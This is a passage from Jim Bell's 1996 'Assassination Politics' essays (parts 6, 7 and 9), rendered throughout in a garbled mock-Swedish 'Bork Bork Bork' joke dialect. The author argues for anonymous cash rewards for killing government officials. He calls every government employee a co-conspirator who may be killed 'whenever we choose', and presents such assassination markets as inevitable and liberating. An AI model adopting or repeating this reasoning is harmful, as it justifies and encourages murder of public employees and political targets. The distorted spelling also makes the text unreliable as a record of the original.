iqooel.)  Ifee su, und iruneecelly, zee eferege-a duneshun lefel fur peuple-a
leested by OorgA vuoold leekely be-a heegher, seence-a (iff ve-a essoome-a zeese-a ere-a
"deserfeeng" peuple-a) mure-a peuple-a veell be-a cuntreebooting tooerds zeeur
demeese-a.
Bork Bork Bork!

Effter ell, iff a putenteeel dunur vunts tu "heet" sume-a gufernment beegvig,
zeere-a veell be-a PLENTY ooff oozeer dunurs tu shere-a zee cust veet.  Meelliuns
ooff duneshuns ooff $1 tu $10 iech vuoold be-a cummun und qooeete-a icunumeecel.  Oon
zee oozeer hund, iff yuoo joost selected a terget oooot ooff zee telephune-a
durectury, un "undeserfeeng" terget, yuoO'll prubebly be-a zee oonly persun
vunteeng tu see-a heem deed, vheech meuns thet yuoO'll prubebly hefe-a tu fuut
zee vhule-a beell ooff perheps $5K tu $10K iff yuoo vunt tu see-a uny "ecshun."
Edd tu thet OorgB 's "coot," vheech veell prubebly be-a 50%, und yuoO're-a
telkeeng $10K tu $20K.   I cuntend thet zee leekelihuud ooff thees keend ooff
theeng ectooelly heppeneeng veell be-a qooeete-a loo, fur "undeserfeeng feectims."

Noo, zee deee-a-herds emung yuoo veell prubebly oobject tu zee fect thet ifee
thees teeny reseedooel pusseebility is lefft.  Boot cunseeder:  Ifee _tudey_ it
vuoold be-a qooeete-a "pusseeble-a" fur yuoo tu peeck a neme-a rundumly oooot ooff a leest,
feend heem und keell heem yuoorselff.   Dues thees freqooently heppee?
Epperently nut.  Fur joost oone-a theeng, zeere's nu reel muteefe-a.  Unless yuoo
cun shoo thet zee eppleeceshun ooff "essesseeneshun puleetics" vuoold
dremeteecelly increese-a zee leekelihuud ooff sooch inceedents, I sooggest thet
thees "prublem" veell leekely nut be-a a prublem effter ell.
Bork Bork Bork!

Fur a vheele-a, I thuooght thet zee "leck ooff a muteefe-a" prutecshun ves
mumentereely oofertoorned by a hypuzeeteecel:  I thuooght, sooppuse-a a persun
used thees system es pert ooff a supheesticeted ixturshun scheme-a, in vheech
he-a sends un ununymuoos messege-a tu sume-a reech cherecter, seyeeng sumetheeng
leeke-a "pey me-a a zeelliun dullers ununymuoosly, oor I poot oooot a deegitel
cuntrect oon yuoo."   Fur a vheele-a, thees oone-a hed me-a stoomped.  Zeen, I
reeleezed  thet un issenteeel ilement in thees vhule-a pley ves meessing:  Iff
thees cuoold be-a dune-a OoNCE, it cuoold be-a dune-a a duzee teemes .  Und zee
feectim ooff sooch un ixturshun scheme-a hes nu essoorunce-a thet it vun't heppee
egeeen, ifee iff he-a peys ooffff, su iruneecelly he-a hes nu muteefeshun tu pey
ooffff zee ixturshun.  Theenk ebuoot it:  Zee oonly reesun tu meke-a zee peyment
is tu remufe-a zee threet.  Iff mekeeng zee peyment cun't gooeruntee-a tu zee
terget thet zee threet is remufed, he-a hes nu reesun tu meke-a zee peyment.
Bork Bork Bork!
Und iff zee terget hes nu reesun tu meke-a zee peyment, zee ixturshuneest
hes nu reesun tu meke-a zee threet!

Unuzeer, releted (und iqooelly seemplistic) feer is thet puleeticel
meenurities veell be-a prefferenteeelly tergeted.  Fur ixemple-a, vhee I pueented
oooot thet "istebleeshment" puleeticel leeders vuoold prubebly "gu" qooeete-a
qooeeckly, oone-a veg sooggested tu me-a thet "leeberteriun leeders" cuoold
leekooise-a be-a tergeted.  Sooch a sooggesshun refflects a sereeuoos
meesoonderstunding ooff puleeticel pheelusuphy, und leeberteriuns in
perteecooler:  I cunseeder it oobfeeuoos (tu me-a, et leest) thet leeberteriuns
NEED nu leeders.  (Yuoo dun't need leeders iff yuoo dun't vunt tu cuntrul
a pupooleshun, oor echeeefe-a puleeticel pooer.  Zee oonly reesun leeberteriuns
"need" leeders tudey is tu teke-a pleces in zee gufernment und (zeen) tu
shoot it doon.)   Und iff my idea is implemented, "leeberteriun leeders"
represent nu mure-a ooff a threet tu unyune-a thun zee eferege-a leeberteriun
ceetizee.
Bork Bork Bork!

Foolly recugneezing thees, unuzeer (und fer mure-a credeeble-a) persun thuooght a
vheele-a, und in a pruood refeleshun sooggested thet oone-a vey thet zee
istebleeshment vuoold "feeght beck" is tu cunfert tu a gufernment thet is
besed oon foolly decentreleezed oothureety, es ooppused tu zee leeder-centreec
system ve-a hefe-a tudey.  Sooch a system cuoold nut be-a ettecked by keelling
indeefidooel peuple-a, uny mure-a thun yuoo cun keell a tree-a by poolleeng ooffff a
seengle-a leeff.  Hees "sulooshun" ves, in iffffect, tu tutelly deesbund zee
coorrent gufernment und toorn it oofer tu zee poobleec et lerge-a, vhere-a it
vuoold be-a seffe-a frum "etteck."  My smeele-a remeended heem thet he-a hed, in
iffffect, tutelly re-a-infented my ooreeginel idea:  My guel is a heeghly
de-a-centreleezed system thet is nut cuntrulled by a teeny frecshun ooff zee
pupooleshun in a strooctoore-a celled a "gufernment," issenteeelly identeecel
tu hees idea.  Su in iffffect, zee oonly vey zee gufernment cun soorfeefe-a is
tu tutelly soorrender.  Und oonce-a it soorrenders, zee peuple-a veen.  Und in
precteece-a, it veell hefe-a nu elterneteefe-a.
Bork Bork Bork!


Veell thees idea be-a "oooot ooff cuntrul"?  Tu a greet ixtent, thet depends oon
vhet yuoor deffeenishun ooff zee vurd, "cuntrul," is.   I hefe-a cume-a tu
beleeefe-a thet "essesseeneshun puleetics" is a puleeticel Rurshech (ink-blut)
test:  Vhet yuoo theenk ooff it is strungly releted tu yuoor puleeticel
pheelusuphy.
Bork Bork Bork!

[ind pert 6]


"Essesseeneshun Puleetics" Pert 7, by Jeem Bell

Deer leeberteriun Freeend,

I fery mooch understund zee cuncerns yuoo fueeced ebuoot my idea vheech I cell,
"Essesseeneshun Puleetics," becoose-a thees issey is nutheeng iff it
is nut redeecel und ixtreme-a.  I vrute-a it, in zee meeddle-a ooff lest yeer, pertly
becoose-a I theenk leeberteriunism und leeberteriuns in perteecooler need tu
eddress vhet is, iff nut a "cuntredeecshun," is et leest un intulereble-a
reeleety:  Oon zee oone-a hund, ve-a ere-a tuld nut tu ineetiete-a egresseeun, boot oon zee
oozeer ve-a ere-a egressed egeeenst by zee gufernment ifery teeme-a it cullects a tex.
Bork Bork Bork!

I mooch eppreceeete-a zee vey sume-a peuple-a I knoo hefe-a "drupped oooot" ooff zee
system, und zee goots thet sooch a tecteec reqooures.  Boot thet's zee prublem, I
theenk:  Oonly thuse-a veet zee "goots" du it, vheech geefes zee gufernment fooer
tergets su
thet it cun spend mure-a teeme-a etteckeeng zee foo vhu ooppuse-a it.  Zee reeleety is
thet zee gufernment STILL cullects texes, und it STILL uses thet muney tu
feeulete-a oooor reeghts.  Ve-a ell knoo thet's vrung.
Bork Bork Bork!

My puseeshun is qooeete-a seemple-a:  Iff tex cullecshun cunsteetootes egresseeun, zeen
unyune-a dueeng it oor esseesting in zee iffffurt oor beneffeetting frum zee pruceeds
zeereuff is a creeminel.  Thees is qooeete-a uneluguoos tu coorrent lev vheech
prusecootes cu-cunspureturs.  Vheele-a I em nut huldeeng oooot "coorrent lev" es
sume-a surt ooff guld-stunderd ooff reesunebleness thet ve-a moost elveys eccept, oon
zee oozeer hund I theenk it's plooseeble-a tu use-a it tu shoo thet oonce-a ve-a hefe-a
cume-a tu zee cunclooseeun thet texeshun is zeefft, zee prescreepshun fulloos
durectly by a furm ooff reesuneeng ellegedly eccepteble-a tu suceeety: It is
reesuneble-a tu "etteck zee etteckers" und zeeur cu-cunspureturs, und iferyune-a
vhu is impluyed by zee gufernment is thoos a cu-cunspuretur, ifee iff he-a is
nut durectly infulfed in zee cullecshun ooff thuse-a texes.  Thet's becoose-a he-a
IS infulfed in _beneffeetting_ frum zee pruceeds ooff zeese-a texes, und he-a
presoomebly prufeedes a certeeen lefel ooff "beckoop" tu zee yuoong thoogs thet
gufernmentel oorguneezeshuns oofftee hure-a.
Bork Bork Bork!


I reeleeze-a, und yuoo shuoold tuu, thet zee "nun-egresseeun preenciple-a" seys
nutheeng ebuoot
zee IXTENT ooff zee selff-deffense-a/reteleeeshun thet oone-a meeght reesunebly impluy
in deffendeeng oone's oovn reeghts:  In a sense-a, thet suoonds leeke-a un oomeessiun
becoose-a it et leest sooggests thet a persun meeght "unreesunebly" deffend
heemselff veet lethel furce-a vhee fer less dresteec meuns meeght nurmelly be-a
celled fur.  Fur vhet it's vurt, I theenk must peuple-a veell behefe-a
respunseebly.   Boot I theenk it is pretty streeeghtffurverd tu ergooe-a thet vhetefer
meuns ere-a necessery tu stup zee etteck, ere-a reesuneble-a geefee zee terms ooff
zee nun-egresseeun preenciple-a:  Iff a geefee meuns ere-a knoon tu be-a inedeqooete-a tu
ectooelly stup zee etteck, zeen foorzeer und mure-a sereeuoos meuns ere-a reesuneble-a
und celled-fur.
Bork Bork Bork!

Tu set up a reesuneble-a unelugy, iff I'm velkeeng doon zee cununeecel "derk
elley" und em eccusted by a mun veeelding a kneeffe-a threeteneeng me-a veet it, it
is presoomebly reesuneble-a fur me-a tu pooll a goon und threetee beck, oor pusseebly
teke-a zee incuoonter tu zee feenel cunclooseeun ooff goonffure-a.  Ifee iff I shuoold
chuuse-a tu huld my fure-a und test tu determeene-a vhezeer my ecshuns deterred
heem, I cun't see-a thet thees pusseebility beends me-a murelly.  Und shuoold he-a
edfunce-a, despeete-a zee goon, es iff tu etteck, I shuoold feel nu remurse-a in
shuuteeng heem und tekeeng myselff oooot ooff dunger.  Iff yuoo eccept zee premeeses su
fer, yuoo epperently eccept zee preenciple-a thet isceleshun ooff zee
selff-deffense-a/reteleeeshun is reesuneble-a es lung es iff zee coorrent lefel ooff
retoorned cuoonter-threet is inedeqooete-a tu stup zee egresseeun ineetieted by zee
oozeer
perty.  Tu beleeefe-a oozeerveese-a is tu beleeefe-a thet ulteemetely,  yuoo ere-a
oobleegeted tu eccept a certeeen heegh lefel ooff egresseeun seemply becoose-a yuoo du
nut hefe-a zee resuoorces (yet) tu reseest it.  I tutelly reject thees cuncept,
es I hupe-a yuoo vuoold.
Bork Bork Bork!

Su iff, hypuzeeteecelly, I cuoold hefe-a un ununymuoos cunferseshun veet a
herd-nused gufernment impluyee-a, und esked heem, "Iff I keelled oone-a ooff yuoor
egents, vuoold yuoo stup tryeeng tu cullect thet tex frum me-a," hees predeecteble-a
reecshun vuoold be-a, "nu, ve-a vuoold cunteenooe-a tu try tu cullect thet tex."  In
fect, he-a vuoold prubebly hestee tu edd thet he-a vuoold try tu hefe-a me-a
prusecooted fur moorder, es vell!  Iff I vere-a tu esk iff keelling tee egents
vuoold stup zeem, egeeen zeey vuoold presoomebly sey thet thees vuoold nut chunge-a
zeeur ecshuns.
Bork Bork Bork!

Zee cunclooseeun is, tu me-a, oobfeeuoos:  Cleerly, zeere-a is nu precteecel leemit tu
zee emuoont ooff selff-deffense-a thet I vuoold need tu prutect my essets frum zee
gufernment tex cullectur, und tu ectooelly stup zee zeefft, su I sooggest thet
lugeec reqooures thet I be-a murelly und itheecelly ellooed (under leeberteriun
preenciples) tu use-a vhetefer lefel ooff selff-deffense-a I chuuse-a.
Bork Bork Bork!

Yuoo reeesed unuzeer oobjecshun, thet qooeete-a frunkly I beleeefe-a is infeleed.  I
beleeefe-a yuoo impleeed thet unteel a speceeffic lefel ooff isceleshun is reeched (
sooch es zee Feds shooeeng up oon yuoor duurstep, itc) zeen it is nut legeetimete-a
tu deffend ooneselff.  Deleecetely, I moost deesegree-a.  Es ve-a ell vell knoo,
gufernment ulteemetely ooperetes preemerily nut oon ectooel, eppleeed furce-a, boot
seemply zee threet ooff footoore-a furce-a iff yuoo du nut cumply.  Trooe-a, zeere-a ere-a
peuple-a vhu hefe-a deceeded tu cell zee gufernment's blooffff und seemply drup oooot,
boot zee reeleety is thet thees is nut precteecel fur must indeefidooels tudey.
Bork Bork Bork!
Thees is nu ecceedent:  Zee gufernment mekes it deefffficoolt tu drup oooot, becoose-a
zeey ixturt zee cuupereshun ooff bunks und putenteeel impluyers und oozeers veet
vheech yuoo vuoold oozeerveese-a be-a eble-a tu freely cuntrect.   In uny cese-a, I feeel
tu see-a hoo nut "druppeeng oooot" mekes oone-a sumehoo murelly oobleegeted tu pey a
tex (oor tulerete-a zee cullecshun ooff oone-a).   I troost yuoo deed nut inedfertently
meun tu sooggest thees.
Bork Bork Bork!

Zee reesun, murelly, ve-a ere-a inteetled tu shuut zee moogger iff he-a vefes zee
kneeffe-a in oooor fece-a is thet he-a hes threetened us veet herm, in thees cese-a tu
oooor leefes, boot zee threet zee gufernment represents tu zee eferege-a ceetizee
(luss ooff oone's inture-a essets) is joost es reel, elbeeet sumoohet deefffferent.
Bork Bork Bork!
Seence-a gufernment is a pest reeleety, und a present reeleety, und hes zee
immedeeete-a pruspects ooff beeeng a footoore-a reeleety es vell, I seencerely beleeefe-a
thet zee eferege-a ceetizee cun legeetimetely cunseeder heemselff CONTINOOOOOSLY
threetened.  Zee egresseeun hes elreedy ooccoorred, in cunteenoouoosly ooccoorreeng,
und hes ifery pruspect ooff cunteenooing tu ooccoor.  Iff unytheeng vuoold joosteeffy
feeghting beck, thees vuoold.
Bork Bork Bork!

Tu cunteenooe-a zee unelugy, iff yuoO'fe-a beee repeetedly moogged by zee seme-a gooy
doon zee seme-a derk elley fur iech dey ooff lest munt, thet DOES NOT meun thet
yuoO'fe-a sumehoo cunsented tu zee seetooeshun, oor thet yuoor reeghts tu yuoor
essets hefe-a sumehoo beee veeefed.  Veet my "Essesseeneshun Puleetics" issey, I
seemply prupused tht ve-a (es leeberteriuns es vell es beeeng oordeenery ceetizens)
begeen tu treet egresseeun by gufernment es beeeng issenteeelly iqooeefelent tu
egresseeun by mooggers, repeests, rubbers, und moorderers, und feeoo zeeur ects
es a cunteenooing sereees ooff egresseeuns.  Seee thees vey, it shuoold nut be-a
necessery tu veeet fur zeeur NEXT egresseeun; zeey veell hefe-a elveys hefe-a beee
egresseeng und zeey veell elveys BE egresseeng, egeeen und egeeen, unteel zeey ere-a
stupped fur guud.
Bork Bork Bork!

Et thet pueent, zee qooesshun sheeffted tu oone-a ooff precteecelity:  Soore-a,
zeeureteecelly ve-a meeght murelly hefe-a zee "reeght" tu prutect oooorselfes veet
lethel furce-a, boot iff zeey hefe-a uny repooteshun et ell, gufernment egents hefe-a
a hebeet ooff shooeeng up in lerge-a noombers vhee zeey ectooelly epply durect
furce-a.  Tu teke-a a puseeshun thet yuoo cun oonly deffend yuoorselff vhee _zeey'fe-a_
chusee zee "vhere-a" und "vhee" ooff zee cunffruntreshun is doonreeght sooeecidel,
und I hupe-a yuoo understund thet I vuoold cunseeder uny sooch restreecshun tu be-a
heeghly unffeur und tutelly imprecteecel.  Understund, tuu, thet zee reesun
ve're-a steell stoock under zee thoomb ooff zee gufernment is thet tu zee ixtent
it's trooe-a, "ve'fe-a" beee pleyeeng by THEIR rooles, nut by oooor oovn.  By oooor oovn
rooles, THEY ere-a zee egressurs und ve-a shuoold be-a eble-a tu treet zeem
eccurdeengly, oon oooor oovn terms, et oooor oovn cunfeneeence-a, vhenefer ve-a chuuse-a,
ispeceeelly vhee ve-a feel zee oodds ere-a oon oooor seede-a.
Bork Bork Bork!

I understund, oobfeeuoosly, thet zee "nu ineetieshun ooff egresseeun" preenciple-a is
steell feleed, boot pleese-a recugneeze-a thet I seemply dun't cunseeder it tu be-a a
feleed cuoonter-ergooment tu "Essesseeneshun Puleetics," et leest es eppleeed tu
tergets vhu heppee tu be-a gufernment egents.  Zeey'fe-a "pre-a-egressed," und I
dun't see-a uny leemit tu zee deffenses I shuoold be-a eble-a tu mooster tu stup thet
egresseeun cumpletely und permunently.  Nut thet I dun't see-a a deefffference-a
betveee deefffferent lefels ooff gooeelt:  I foolly recugneeze-a thet sume-a ooff zeem ere-a
fer vurse-a thun oozeers, und I vuoold certeeenly nut treet a looly Furest
Serfeece-a groont in zee seme-a fesheeun es un ETF sneeper.
Bork Bork Bork!

Noo, zeere-a is oone-a mure-a theeng thet I vuoold hupe-a ve-a cuoold get streeeght:  Es I
ooreeginelly "infented" thees system, it ooccoorred tu me-a thet zeere-a cuoold be-a
certeeen ergooments thet it needed tu be-a "regooleted" sumehoo;  "unvurthy"
tergets shuooldn't be-a keelled, itc.  Zee "prublem" is, vhet I'fe-a "infented"
mey (es I noo beleeefe-a it tu be-a) ectooelly a "deescufery," in a sense-a:  I noo
beleeefe-a thees keend ooff system ves elveys inefeeteble-a, merely veeeting fur zee
treeed ooff zee Internet, deegitel cesh, und guud incrypshun in oorder tu prufeede-a
zee techneecel underpeennings fur zee inture-a system.  Iff thet is genooeenely zee
cese-a, zeen zeere-a is nu reel vey tu cuntrul it, ixcept by free-a-merket
preenciples.
Bork Bork Bork!

It vuoold be-a impusseeble-a, fur ixemple-a, tu set up sume-a surt ooff
"Essesseeneshun Puleetics Deectetur," vhu deceedes vhu veell leefe-a und vhu veell
deee-a, becoose-a cumpeteeshun in zee system veell elveys reese-a tu soopply ifery
demund, elbeeet et pusseebly a fery heegh preece-a.  Und iff yuoo beleeefe-a zee mexeem
thet "ebsuloote-a pooer curroopts ebsulootely," yuoo vuooldn't vunt tu eccept uny
furm ooff centreleezed cuntrul (ifee, perheps, thet ooff yuoor oovn!), becoose-a uny
sooch cuntrul vuoold ifentooelly be-a curroopted.  Must reshunel peuple-a recugneeze-a
thees, und I du tuu.  I vuoold nut hefe-a infented a system vhere-a "Jeem
Bell" gets tu meke-a "ell zee deceesiuns."  Qooeete-a zee cuntrery, zee system I'fe-a
descreebed ebsulootely prefents sooch centreleezeshun.  Thet, qooeete-a frunkly, is
zee nufelty und dere-a I sey it, zee beooty ooff thees idea.  I beleeefe-a thet it
seemply cunnut be-a heejecked by centreleezed puleeticel cuntrul.
Bork Bork Bork!

Es I pueented oooot in zee issey, iff _I_ vere-a roonneeng oone-a ooff zee oorguneezeshuns
eccepteeng thuse-a duneshuns und ooffffereeng thuse-a preezes, I vuoold selecteefely
leest oonly thuse-a tergets vhu I em genooeenely seteesffied ere-a gooeelty ooff zee
feeuleshun ooff zee "nun-egresseeun preenciple-a."  Boot es a precteecel metter,
zeere-a is nu vey thet I cuoold stup a DIFFERENT oorguneezeshun frum beeeng set up
und oopereteeng under DIFFERENT murel und itheecel preenciples, ispeceeelly iff it
oopereted
ununymuoosly, es I unteepete-a zee "Essesseeneshun Puleetics"-type-a  systems veell
be-a.   Thoos, I'm furced tu eccept zee reeleety thet I cun't deectete-a a
"strungly leemited" system thet vuoold "gooeruntee-a" nu "unjoosteeffied" deeths:  I
cun merely cuntrul my leettle-a peeece-a ooff zee iert und nut esseest in zee eboose-a
ooff oozeers.  I genooeenely beleeefe-a, hooefer, thet zee oopereshun ooff thees system
vuoold be-a a fest imprufement oofer zee stetoos qoou.
Bork Bork Bork!

Thees, I ergooe-a, is sumoohet uneluguoos tu un ergooment thet ve-a shuoold be-a
inteetled tu oovn fureerms, despeete-a zee fect thet SOME peuple-a veell use-a zeem
vrungly/immurelly/illegelly.  Zee oovnersheep is a reeght ifee thuoogh it mey
ulteemetely elloo oor ineble-a un eboose-a thet yuoo cunseeder vrung und pooneesheble-a.
Bork Bork Bork!
I cunseeder zee troot ooff sooch un ergooment tu be-a oobfeeuoos und currect, und I
knoo yuoo vuoold tuu.
Bork Bork Bork!

I reeleeze-a thet thees lecks zee creesp certeetoode-a ooff seffety vheech vuoold be-a
reessooreeng tu zee eferege-a, "pre-a-leeberteriun" indeefidooel.  Boot yuoo ere-a nut
zee "eferege-a indeefidooel" und I troost thet es lung-teeme-a leeberteriuns  yuoo
veell recugneeze-a reeghts moost ixeest ifee geefee zee hypuzeeteecel pusseebility
thet sumebudy mey ifentooelly eboose-a zeem.
Bork Bork Bork!

I du nut knoo vhezeer I "infented" oor "deescufered" thees system; perheps it's
a leettle-a ooff but. I du genooeenely beleeefe-a thet thees system, oor oone-a leeke-a it,
is es cluse-a tu beeeng technulugeecelly inefeeteble-a es ves zee infenshun ooff
fureerms oonce-a zee metereeel ve-a noo knoo es "goonpooder" ves infented.  I theenk
it's oon zee vey, regerdless ooff vhet ve-a du tu stup it.  Perheps mure-a thun
unyune-a ilse-a oon zee fece-a ooff thees plunet, thees nushun hes feelled me-a,
seqooenteeelly und zeen seemooltuneuoosly, veet eve-a, estuneeshment, juy, terrur,
und feenelly, releeeff.
Bork Bork Bork!

Eve-a, thet a system cuoold be-a prudooced by a hundffool ooff peuple-a thet
vuoold reed zee vurld ooff zee scuoorge-a ooff ver, noocleer veepuns, gufernments, und
texes.  Estuneeshment, et my reeleezeshun thet oonce-a sterted, it vuoold cufer
zee inture-a glube-a inexurebly, ireseeng deecteturships but fesceestic und
cummooneestic, munercheees, und ifee su-celled "demucreceees," vheech es a
generel roole-a tudey ere-a reelly joost zee fecede-a ooff gufernment by zee speceeel
interests.  Juy, thet it vuoold ileeminete-a ell ver, und furce-a zee deesmuntling
nut oonly ooff ell noocleer veepuns, boot elsu ell meeliteries, mekeeng zeem nut
merely redoondunt boot elsu cunseedered uneeferselly dungeruoos, leefeeng zeeur
"oovners" nu chueece-a boot tu deesmuntle-a zeem, und in fect nu reesun tu KEEP zeem!

Terrur, tuu, becoose-a thees system mey joost chunge-a elmust IFERYTHING hoo ve-a
theenk ebuoot oooor coorrent suceeety, und ifee mure-a fur myselff persunelly, zee
knooledge-a thet zeere-a mey sume-a dey be-a a lerge-a budy ooff veelthy peuple-a vhu ere-a
throon ooffff zeeur coorrent puseeshuns ooff cuntrul ooff zee vurld's gufernments,
und zee fery-reel pusseebility thet zeey mey luuk fur a "feellein" tu bleme-a
fur zeeur doonffell.  Zeey veell feend oone-a, in me-a, und et thet teeme-a zeey veell
hefe-a zee muney und (thunks tu me-a, et leest perteeelly) zee meuns tu see-a zeeur
refenge-a.  Boot I vuoold nut hefe-a poobleeshed thees issey iff I hed beee unveelling
tu eccept zee reesk.
Bork Bork Bork!

Feenelly, releeeff.  Meybe-a I'm a beet premetoore-a tu sey it, boot I'm seteesffied ve-a
_veell_ be-a free-a.  I'm cunfeenced zeere-a is nu elterneteefe-a.  It mey feel leeke-a a
ruller-cuester reede-a oon zee vey zeere-a, boot es ooff tudey I theenk oooor
desteeneshun is certeeen.  Pleese-a understund, ve-a _veell_ be-a free-a.
Bork Bork Bork!

Yuoor leeberteriun freeend,

Jeem Bell

"Essesseeneshun Puleetics" Pert 9, by Jeem Bell, Febrooery 27, 1996

Fur ebuoot a yeer I hefe-a beee cunseedering zee impleeceshuns ooff "Essesseeneshun
Puleetics," und fur mure-a thun seex munths I'fe-a beee shereeng zee soobject und my
mooseengs veet yuoo, zee interested reeder.  I'fe-a elsu beee debeteeng zee issooe-a
veet ell cumers, a selff-selected boonch vhu runge-a frum inthooseeestic
prupunents tu clooeless creetics.  Iruneecelly, sume-a ooff yuoo hefe-a ifee cheeded me-a
fur "vesteeng teeme-a" veet sume-a ooff zee less percepteefe-a emung my noomeruoos
"ooppunents."  In deffense-a, my respunse-a hes elveys beee thet vhee I respund tu
a persun, I du it nut preemerily fur hees beneffeet, boot fur oozeers vhu meeght be-a
fence-a-seetting und ere-a veeeting tu see-a iff my idea veell breek doon unyvhere-a.
Bork Bork Bork!

Iff zeere-a is unytheeng vheech hes fesceeneted me-a es mooch es zee ooreeginel idea,
it is thees fest und dremeteec deesperity betveee zeese-a  fereeuoos respunses.
Bork Bork Bork!
It's beee celled iferytheeng frum "a vurk ooff geneeoos" tu "etruceeuoos," und
prubebly mooch vurse-a!  Cleerly, zeere-a moost be-a a foondementel, suceeel issooe-a
here-a thet needs tu be-a resulfed.
Bork Bork Bork!

Vheele-a nubudy hes qooeete-a yet seeed it in thuse-a terms, I'm soore-a thet mure-a thun
oone-a ooff yuoo hefe-a prubebly vunted tu reect tu my pruse-a veet zee leene-a, "See-a a
shreenk!"  [Emereecun slung fur a psychreeetrist, fur zee interneshunel reeders
oooot zeere-a.]  Vell, in a sense-a thet's ixectly vhet I deed, boot zee "shreenk" I
"sev" hed beee deed fur oofer feefe-a  decedes:  Seegmoond Freood.  Mooch tu my
soorpreese-a, I ves hunded a cupy ooff a buuk, Intrudoocshun tu Greet Buuks (ISBN
0-945159-97-8) vheech cunteeened (pege-a 7) a letter frum Freood tu Elbert
Ieenstein.  Oon pege-a 6, zeere-a is un intrudoocshun, descreebing zee reesun fur
thees cummooneeceshun.   It seys:

"In 1932, zee Leegooe-a ooff Neshuns esked Elbert Ieenstein tu chuuse-a a prublem ooff
interest tu heem und tu ixchunge-a feeoos veet sumeune-a ebuoot it.  Ieenstein chuse-a
"Is zeere-a uny vey ooff deleefering munkeend frum zee menece-a ooff ver?" es hees
prublem und Seegmoond Freood es hees currespundent.  In hees letter tu Freood,
Ieenstein seeed thet oone-a vey ooff ileemineting ver ves tu istebleesh a
soopruneshunel oorguneezeshun veet zee oothureety tu settle-a deespootes betveee
neshunes und pooer tu inffurce-a its deceesiuns.  Boot Ieenstein ecknooledged thet
thees sulooshun deelt oonly veet zee edmeenistretife-a espect ooff zee prublem, und
thet interneshunel secooreety cuoold nefer be-a echeeefed unteel mure-a ves knoon
ebuoot hoomun psychulugy.  Moost reeght elveys be-a sooppurted by meeght?  Ves
iferyune-a sooscepteeble-a tu feeleengs ooff hete-a und destroocteefeness?  It ves tu
zeese-a qooesshuns Freood eddressed heemselff in hees reply."

Interesteengly inuoogh, vhee I furst sterted theenking ebuoot zee idea thet I
vuoold leter term "Essesseeneshun Puleetics," I ves nut intendeeng tu deseegn a
system thet hed zee cepebeelity tu ileeminete-a ver und meeliteries.  Vhet I ves
tergeteeng, preemerily, ves puleeticel tyrunny.  By my stunderds, thet inclooded
nut merely tuteleeteriun gufernments boot elsu oones thet muny ooff us vuoold
cunseeder fer mure-a beneegn, in perteecooler zee Federel gufernment ooff zee Uneeted
Stetes ooff Emereeca, "my" cuoontry.  Oonly effter I hed thuooght ooff zee
foondementel preenciple-a ooff ellooeeng lerge-a noombers ooff ceetizens tu du evey veet
unvunted puleeticiuns ves I "furced," by my vurk up tu thet pueent, tu eddress
zee issooe-a ooff zee lugeecel cunseqooences ooff zee oopereshun ooff thet system, vheech
(by "tredeeshunel" veys ooff theenking) vuoold leefe-a thees cuoontry veethuoot
leeders, oor a gufernment, oor a meelitery, in a vurld veet muny threets.  I
ves lefft veet zee seme-a foondementel prublem thet's plegooed zee leeberteriun
unelysees ooff furmeeng a cuoontry in a vurld dumeeneted by nun-leeberteriun
stetes:  It ves nut cleer hoo sooch a cuoontry cuoold deffend itselff frum
egresseeun iff it cuoold nut furce-a its ceetizens tu feeght.
Bork Bork Bork!

Oonly zeen deed I reeleeze-a thet iff thees system cuoold vurk veethin a seengle-a
cuoontry, it cuoold elsu vurk vurldveede-a, ileemineting threets frum ooootseede-a zee
cuoontry es vell es curroopt puleeticiuns veethin.  Und shurtly zeereeffter, I
reeleezed thet nut oonly cuoold thees ooccoor, sooch a spreed ves ebsulootely
inefeeteble-a, by zee fery netoore-a ooff mudern cummooneeceshuns ecruss zee Internet,
oor oolder technulugeees sooch es zee telephune-a, fex, oor ifee letters vreettee oon
peper.  In shurt, nu ver need ifer ooccoor egeeen, becoose-a nu deespoote-a vuoold
ifer infulfe-a mure-a thun a teeny noomber ooff peuple-a et uny oone-a teeme-a.  Foorzeer, nu
tyrunt vuoold ifer be-a eble-a tu reese-a tu zee lefel ooff leeder, leedeeng hees
cuoontry intu a destroocteefe-a ver egeeenst zee veeshes ooff hees mure-a reesuneble-a
ceetizens.  He-a vuoold be-a ooppused, lugeecelly inuoogh, by zee ceetizens ooff zee
cuoontry he-a intended tu ver veet, oobfeeuoosly, boot he-a vuoold elsu drev zee ire-a
ooff ceetizens veethin hees oovn cuoontry vhu ieezeer deedn't vunt tu pey zee texes
tu sooppurt a vesteffool ver, oor luse-a zeeur suns und dooghters in pueentless
bettles, oor fur thet metter vere-a seemply ooppused tu perteecipeting in zee
egresseeun.  Tugezeer, ell zeese-a putenteeelly-effffected peuples vuoold uneete-a
(elbeeet qooeete-a ununymuoosly, ifee frum iech oozeer) und destruy zee tyrunt
beffure-a he-a hed zee ooppurtooneety tu meke-a zee ver.
Bork Bork Bork!

I ves utterly estuneeshed.  Seemeengly, und veethuoot intendeeng tu du su, I hed
prufeeded a sulooshun fur zee "ver" prublem thet hes plegooed munkeend fur
meellennia.  Boot hed I?  I reelly dun't knoo.  I du knoo, hooefer, thet fery
foo peuple-a hefe-a chellenged me-a oon thees perteecooler cleeem, despeete-a vhet vuoold
nurmelly eppeer tu be-a its fest imprubebeelity.  Vheele-a sume-a ooff zee less
percepteefe-a creetics ooff "Essesseeneshun Puleetics" hefe-a eccoosed me-a ooff
ileemineting ver und replece-a it veet sumetheeng thet veell ind up beeeng vurse-a,
it is trooly emezeeng thet mure-a peuple-a hefen't bereted me-a fur nut oonly
beleeefing in zee impusseeble-a, boot elsu beleeefing thet zee impusseeble-a is noo
ectooelly inefeeteble-a!

A leettle-a mure-a thun a veek egu, I ves hunded thees buuk, und esked tu reed
Freood's letter, by a persun vhu ves evere-a ooff my "leettle-a" pheelusuphicel
qooundery.  I begun tu reed Freood's letter in respunse-a tu Ieenstein, hefeeng
nefer reed uny oozeer vurd Freood hed vreettee, und  hefeeng reed issenteeelly
nune-a ooff zee vurks ooff zee geeunts ooff Pheelusuphy.  (Noo, ooff cuoorse-a, I feel
tremenduoosly gooeelty et zee oomeessiun in my idooceshun, boot I'fe-a elveys beee
ettrected mure-a tu zee "herd sceeences," leeke-a chemeestry, physeecs, mezeemeteecs,
ilectruneecs, und cumpooters.)  Seence-a thees letter ves speceefficelly oon ver, und
zee qooesshun ooff  vhezeer mun cuoold ifer efueed it, I felt perheps it vuoold
cunteeen sume-a fect oor ergooment thet vuoold currect vhet ves seemply a
tempurery, felse-a impresseeun in my meend. Seemooltuneuoosly, I ves hupeffool thet I
